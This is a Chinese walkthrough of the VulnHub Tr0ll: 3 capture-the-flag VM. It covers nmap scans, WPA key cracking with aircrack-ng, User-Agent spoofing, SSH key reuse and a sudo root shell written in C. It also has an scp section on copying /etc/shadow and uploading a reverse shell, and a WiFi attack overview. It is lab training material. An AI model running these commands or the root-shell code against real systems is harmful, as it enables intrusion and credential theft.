横向移动靶场-Tr0ll: 3

ops/2025/3/4 12:04:47/

Tr0ll: 3来自 <Tr0ll: 3 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.187

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.187

SSH服务(22/tcp)

  • 版本:OpenSSH 7.6p1
  • 关联漏洞
    • 该版本存在历史漏洞(如CVE-2019-6111),但可能已修复。
    • Ubuntu 18.04于2023年结束官方支持,可能存在未修补的漏洞。
  • 安全建议
    1. 检查SSH配置
      • 运行 nmap --script ssh2-enum-algos -p22 192.168.23.187 查看支持的加密算法(如是否使用弱算法)。
      • 使用工具 ssh-audit 全面评估SSH安全性。
    2. 认证方式
      • 检查是否允许密码登录(PasswordAuthentication),若允许,尝试弱密码或字典攻击(需合法授权)。
      • 检查是否使用默认密钥(公钥指纹在结果中已公开)。
    3. 版本升级
      • 建议升级到OpenSSH 8.9+以修复已知漏洞。

4,靶场直接告诉了账户/密码:start/here

使用ssh直接登录进去,

然后进行信息收集

id

uname -a

ls /home

5, 尝试查找能用于提权的可执行二进制文件

find / -type f -perm 0777 2>/dev/null

查找到一个流量包文件,scp拷贝该文件到kali攻击机上

scp start@192.168.23.187:/var/log/.dist-manage/wytshadow.cap /root

还有那个藏得很深的txt文件

scp start@192.168.23.187:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt /root

Scp工具使用

scp(Secure Copy Protocol)是用于通过 SSH 协议在本地和远程主机之间安全传输文件的命令行工具。以下是其核心用法和注意事项:

1. 基础语法

scp [选项] 源文件 目标路径

2. 常见场景

本地 → 远程

scp /本地/文件.txt user@remote_ip:/远程/目录/
# 示例:
scp backup.tar.gz admin@192.168.23.187:/var/backups/

远程 → 本地

scp user@remote_ip:/远程/文件.txt /本地/目录/
# 示例:
scp admin@192.168.23.187:/etc/passwd ~/Downloads/

远程 → 远程

scp user1@remote1_ip:/路径/file user2@remote2_ip:/路径/

3. 常用选项

选项

说明

-P 端口

指定 SSH 端口(默认22)

-r

递归复制目录

-C

启用压缩(大文件优化)

-i 密钥文件

使用指定私钥认证

-v

显示详细传输日志(调试用)

4. 典型用法示例

指定端口和密钥

scp -P 2222 -i ~/.ssh/id_rsa data.csv user@192.168.23.187:/home/user/

递归复制目录

scp -r /本地/项目文件夹/ user@192.168.23.187:/opt/

限速传输(单位:KB/s)

scp -l 800 largefile.iso user@192.168.23.187:~/

5. 渗透测试中的应用

  1. 窃取敏感文件(需合法授权):
    scp admin@192.168.23.187:/etc/shadow ./stolen_shadow
  2. 上传后门工具
    scp reverse_shell.py user@192.168.23.187:/tmp/
  3. 绕过基础监控
    • 使用非标准端口(-P)或混杂在正常流量中。

6. 安全注意事项

  1. 密钥保护
    • 私钥文件权限应设为 600:
      chmod 600 ~/.ssh/id_rsa
  2. 审计历史记录
    • 检查远程主机的 ~/.bash_history 是否记录 scp 命令。
  3. 替代方案
    • 优先使用 sftp 或 rsync(支持断点续传和增量同步)。

7. 故障排查

  • 权限拒绝:确保目标目录可写(chmod +w /目标路径)
  • 连接超时:检查防火墙是否放行 SSH 端口
  • Host key验证失败:使用 -o StrictHostKeyChecking=no 跳过验证(不安全,仅测试环境)

6,然后使用wireshark打开这个cap文件

这些协议和WLAN有关,另一个txt文件就是用于爆破这个密码的字典

aircrack-ng -w gold_star.txt wytshadow.cap

暴力破解攻击,得到wifi密钥:gaUoCe34t1

技术参考:近源渗透——WiFi渗透 - FreeBuf网络安全行业门户

802.11协议和kali无线攻击

一、802.11协议基础

1. 协议概述

802.11是IEEE定义的无线局域网(WLAN)标准,涵盖物理层和数据链路层。主要子协议包括:

  • 802.11a/b/g/n/ac/ax
    • 802.11a/b/g:早期标准,分别支持5GHz/54Mbps、2.4GHz/11Mbps、2.4GHz/54Mbps12
    • 802.11n:引入MIMO技术,支持双频(2.4GHz和5GHz),最大速率600Mbps12
    • 802.11ac/ax:现代标准,支持更高带宽(如160MHz信道)和MU-MIMO,速率可达数Gbps12

2. 核心概念

  • SSID:无线网络名称,用于标识网络。
  • BSSID:AP的MAC地址,唯一标识一个基本服务集(BSS)12
  • 信道(Channel):无线频段的子划分,如2.4GHz频段有14个信道(不同国家开放数量不同)12
  • 加密协议:WEP(已淘汰)、WPA/WPA2(PSK/Enterprise)、WPA311

3. 无线网络模式

  • 基础结构模式(Infrastructure):通过AP连接客户端,需关联(Associate)后通信12
  • Ad-hoc模式:无中心节点,设备直连,安全性低12

二、无线流量分析

1. 流量捕获工具

  • Wireshark:图形化协议分析工具,支持深度解析802.11帧结构,可过滤特定协议(如HTTP、TCP)14
  • tcpdump:命令行抓包工具,适合批量捕获数据包(如tcpdump -i wlan0 -w capture.pcap)14
  • Airodump-ng:专用于无线网络的嗅探工具,可捕获握手包(如WPA四次握手)23

2. 分析要点

  • 握手包捕获:针对WPA/WPA2需捕获四次握手(EAPOL帧),用于后续密码破解38
  • 协议漏洞检测:如检测WEP的弱IV(初始化向量)、WPS的PIN漏洞110
  • 异常流量识别:如Deauth泛洪攻击(大量解除认证帧)、ARP欺骗流量89

三、Kali无线网络攻击技术

1. 攻击分类与工具

(1) WEP破解

  • 工具:Aircrack-ng套件(Airodump-ng捕获流量,Aireplay-ng注入ARP包加速数据生成,Aircrack-ng破解)210
  • 原理:利用WEP的弱密钥生成机制和IV重复漏洞,通过统计攻击恢复密钥211

(2) WPA/WPA2-PSK攻击

  • 工具:Aircrack-ng、Hashcat(GPU加速)、Pyrit(预计算PMK)310
  • 流程
    1. 捕获四次握手包(需触发客户端重连,如Deauth攻击)38
    2. 使用字典或暴力破解PSK(如aircrack-ng -w rockyou.txt capture.cap)310

(3) WPS攻击

  • 工具:Reaver(在线PIN破解)、Pixiewps(离线攻击路由器的PRNG漏洞)110
  • 适用场景:目标AP启用WPS且支持PIN模式,破解时间取决于信号强度和PIN复杂度18

(4) 中间人攻击(MITM)

  • 工具:Airbase-ng(创建伪造AP)、Ettercap(ARP欺骗)、Fern Wifi Cracker(自动化GUI工具)18
  • 步骤
    1. 伪造同名AP(ESSID克隆)吸引客户端连接。
    2. 劫持流量并窃取敏感信息(如HTTP凭据)911

(5) 隐蔽攻击

  • MAC地址欺骗:使用Macchanger修改本机MAC地址绕过过滤(macchanger -r wlan0)18
  • SSID隐藏绕过:通过Deauth攻击强制客户端重连以暴露SSID812

2. 高级攻击场景

  • 热点钓鱼(Evil Twin):结合DNS劫持和SSL剥离,诱导用户登录恶意页面911
  • 客户端渗透:通过恶意热点分发Payload(如Metasploit的Meterpreter),控制客户端后横向移动至内网9

四、防御与缓解措施

  1. 加密升级:禁用WEP/WPA,强制使用WPA3或WPA2-Enterprise(802.1X认证)1112
  2. 关闭WPS:避免PIN漏洞被利用110
  3. MAC过滤与端口隔离:限制未授权设备接入,隔离客户端间通信811
  4. 入侵检测系统(IDS):部署工具如Kismet监控异常流量(如Deauth风暴)812
  5. 物理层防护:控制AP信号覆盖范围,减少外部嗅探可能11

五、工具与资源推荐

  • Kali内置工具:Aircrack-ng、Reaver、Wifite(自动化脚本)、Wireshark110
  • 密码字典生成:Crunch(自定义规则)、CUPP(基于用户信息生成)13
  • 学习资料:《Kali Linux无线网络渗透测试详解》(清华大学出版社)6

8,通过近源渗透就成功拿到了目标服务器一个用户的密码,结合之前信息收集发现的用户名可以知道这是wytshadow的密码gaUoCe34t1,使用ssh进行登录(第二个受害者)

登录成功

9,做信息收集,在家目录下发现一个可执行文件

这个 file 命令的输出表明 oohfun 是一个 64-bit ELF 可执行文件,并且具有 setuid 标志,意味着它可能会以文件所有者的权限运行,而不是执行它的用户的权限。执行之后就会疯狂的弹窗

lynx 是一个基于终端的文本模式网页浏览器,用于在 Linux、Unix 及 Windows(Cygwin)环境下访问网页。

  • 不支持 JavaScript 和 CSS,适用于低带宽环境或测试网页的无障碍访问性。
  • 你可以用 lynx URL 直接打开网页,例如:
    lynx Example Domain

10,查看一下具有什么sudo权限

可以看到运行这个用户以root权限启动ngnix服务,那就启动之

sudo /usr/sbin/service nginx start

systemctl status nginx.service

11,使用浏览器访问一下,访问失败。那就说明服务端口可能不是80,使用nmap扫一下工作端口

再访问8080端口试试

403状态码意为服务器成功解析请求但是客户端没有访问该资源的权限

12,查看nginx的配置文件看看是什么原因

在配置文件里面发现日志文件的路径,那么我们可以查看error信息,里面应该记载了为什么拒绝我们访问的操作

没有权限就尴尬了

13,在sites-available知道了原因

原来是规定了只允许Lynx浏览器访问,但是kali没有安装包

14,解决方法很简单。靶机的8080端口是使用nginx通过user-agent来判断来源的,而这个user-agent可以使用burpsuite进行更改。挂上代理,访问网站,抓包发送到repeater模块

需要将user-Agent改成Lynx好欺骗服务器

由此服务器就傻傻的告诉我们下一个用户的账户和密码:genphlux/HF9nd0cR!(第三个受害者)

15,使用ssh服务登录genphlux

信息收集一下,发现一个名为maleus用户的文件,原来是一个RSA私钥

将这个私钥复制到本地将权限改为600,再使用ssh服务直接连接上(第四个受害者)

scp genphlux@192.168.23.187:/home/genphlux/maleus /root

mv maleus id_rsa.tr

chmod 600 id_rsa.tr

ssh -i id_rsa.tr 192.168.23.187 -l maleus

16,文件下发现并查看viminfo信息,该文件记录了VIM输入的一下信息,存在严重的信息泄露发现。由此发现账户maleus的密码B^slc8I$

17,现在条件好了允许我进行提权操作了,查看一下sudo命令覆盖的文件范围

这是一个可执行文件,允许我们通过sudo命令执行。这是提权成为root用户的关键

18,尝试复制此文件到一个新的文件名称为dont_even_bother.c 在此文件使用vim写入提权代码

int main (void){
        setresuid(
0,0,0);
        system(
"/bin/sh");
}

cp dont_even_bother dont_even_bother.c

vim dont_even_bother.c

gcc dont_even_bother.c -o dont_even_bother

sudo ./dont_even_bother

成功提权成为root用户,cat到flag


http://www.ppmy.cn/ops/162430.html

相关文章

tauri2+typescript+vue+vite+leaflet等的简单联合使用(一)

项目目标 主要的目的是学习tauri。 流程 1、搭建项目 2、简单的在项目使用leaflet 3、打包 准备项目 环境准备 废话不多说&#xff0c;直接开始 需要有准备能运行Rust的环境和Node&#xff0c;对于Rust可以参考下面这位大佬的文章&#xff0c;Node不必细说。 Rust 和…

什么是 MGX:MetaGPT

什么是 MGX:MetaGPT MetaGPT是由思码逸(OpenDILab)团队开发的一款专注于生成式AI驱动的软件开发框架,MGX可能是其衍生或升级的相关成果,它创新性地将大语言模型引入软件开发流程,模拟人类软件团队的协作方式,能让用户通过自然语言描述需求,即可自动生成完整的软件项目,…

天佐.乾坤袋 基于抽屉式文件存储的NoSql数据库

天佐.乾坤袋 天佐.乾坤袋 简介 天佐.乾坤袋 基于抽屉式文件存储的NoSql数据库&#xff0c;可用于文件打包&#xff0c;数据整合&#xff0c;加密存放等多种用途。可以方便快捷的搭建和部署存储应用的系统。 传说: 弥勒所有&#xff0c;专做储物之用。拥有不可思议之力&#x…

【区块链 + 智慧政务】 伽罗华域:区块链数据溯源系统 | FISCO BCOS 应用案例

由北京伽罗华域科技有限公司打造的区块链数据溯源系统&#xff0c; 实现了数据从生产、管理到共享的全流程可追溯性和安全审计。系统支持数据的全生命周期管理&#xff0c; 包括数据采集、生产、共享等关键流程&#xff0c; 并通过智能合约自动执行数据的存证、共享与安全审计&…

AQS源码级别解析

AQS AQS 全称是 AbstractQueuedSynchronizer。顾名思义就是一个抽象的&#xff08;可被继承复用&#xff09;&#xff0c;内部存在排队&#xff08;竞争资源的线程排队&#xff09;的同步器&#xff08;对共享资源和线程进行同步管理&#xff09;。 属性 首先来看 AQS 的成员…

深度学习文本生成:从 GPT 到 Transformers

友友们好! 我的新专栏《Python进阶》正式启动啦!这是一个专为那些渴望提升Python技能的朋友们量身打造的专栏,无论你是已经有一定基础的开发者,还是希望深入挖掘Python潜力的爱好者,这里都将是你不可错过的宝藏。 在这个专栏中,你将会找到: ● 深入解析:每一篇文章都将…

海洋cmsv9报错注入,order by 和limit注入

海洋cmsv9 1&#xff0c;我们拿到海洋cmsv9源码分析发现注入点&#xff0c;$rlist 2&#xff0c;seacms开源&#xff0c;可以知道seacmsv9系统数据库&#xff08;mysql&#xff09;为seacms&#xff0c;存放管理员账号的表为 sea_admin&#xff0c;表中存放管理员姓名的字段为…

【Rust中级教程】2.13. 结语(杂谈):我学习Rust的心路历程

2.13.1. 【Rust自学】专栏的缘起 笔者我在去年12月份之前对Rust还一无所知&#xff0c;后来看到JetBrains推出了Rust Rover&#xff0c;想着自己毕竟是买的全产品证书就下载下来玩了一下。原本就是看看&#xff0c;都打算卸载了&#xff0c;后来去网上查才发现Rust这门语言挺牛…